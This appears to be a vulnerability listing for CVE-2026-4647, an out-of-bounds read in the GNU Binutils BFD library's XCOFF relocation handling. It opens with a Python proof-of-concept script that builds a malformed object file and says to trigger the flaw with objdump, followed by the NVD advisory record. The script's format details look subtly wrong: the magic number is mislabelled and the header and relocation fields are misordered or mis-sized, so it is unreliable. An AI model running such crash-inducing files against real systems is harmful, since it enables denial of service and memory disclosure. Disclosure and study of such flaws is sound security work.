CVE-2026-4647

import struct # Conceptual PoC for CVE-2026-4647 # This script generates a malformed XCOFF object file with an invalid relocation type. def create_malformed_xcoff(filename): # XCOFF File Header (Magic 0x01DF for 64-bit XCOFF) magic = 0x01DF nsyms = 0 nscns = 1 timdat = 0 symptr = 0 opthdr = 0 flags = 0 header = struct.pack(">HHIIIIII", magic, 2, nscns, timdat, symptr, nsyms, opthdr, flags) # Section Header (.text) s_name = b".text\x00\x00\x00\x00" s_paddr = 0 s_vaddr = 0 s_size = 100 s_scnptr = 200 s_relptr = 300 # Offset to relocation entries s_lnnoptr = 0 s_nreloc = 1 # Number of relocation entries s_nlnno = 0 s_flags = 0x20 # STYP_TEXT section_header = struct.pack(">8sIIIIIIIIHH", s_name, s_paddr, s_vaddr, s_size, s_scnptr, s_relptr, s_lnnoptr, s_nreloc, s_nlnno, s_flags) # Relocation Entry # The vulnerability is triggered by an invalid 'r_rtype' value used in array indexing r_vaddr = 0 r_symndx = 0 r_rtype = 0xDEADBEEF # Invalid relocation type to trigger Out-of-Bounds Read relocation_entry = struct.pack(">III", r_vaddr, r_symndx, r_rtype) # Padding raw_data = b"\x00" * 100 current_size = len(header) + len(section_header) + len(raw_data) padding = b"\x00" * (s_relptr - current_size) with open(filename, "wb") as f: f.write(header) f.write(section_header) f.write(raw_data) f.write(padding) f.write(relocation_entry) print(f"Malformed XCOFF file created: {filename}") print("Trigger using: objdump -r " + filename) if __name__ == "__main__": create_malformed_xcoff("cve_2026_4647_poc.o")

{"cve": {"id": "CVE-2026-4647", "sourceIdentifier": "[email protected]", "published": "2026-03-23T14:16:36.753", "lastModified": "2026-03-24T19:02:03.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the GNU Binutils BFD library, a widely used component for handling binary files such as object files and executables. The issue occurs when processing specially crafted XCOFF object files, where a relocation type value is not properly validated before being used. This can cause the program to read memory outside of intended bounds. As a result, affected tools may crash or expose unintended memory contents, leading to denial-of-service or limited information disclosure risks."}, {"lang": "es", "value": "Se encontró una falla en la biblioteca BFD de GNU Binutils, un componente ampliamente utilizado para manejar archivos binarios como archivos objeto y ejecutables. El problema ocurre al procesar archivos objeto XCOFF especialmente manipulados, donde un valor de tipo de reubicación no se valida correctamente antes de ser utilizado. Esto puede causar que el programa lea memoria fuera de los límites previstos. Como resultado, las herramientas afectadas pueden bloquearse o exponer contenidos de memoria no deseados, lo que lleva a una denegación de servicio o a riesgos limitados de revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:*", "matchCriteriaId": "70CA109B-85B9-4EF2-9A5F-A7D12F6EA878"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-4647", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450302", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33919", "source": "[email protected]", "tags": ["Broken Link"]}]}}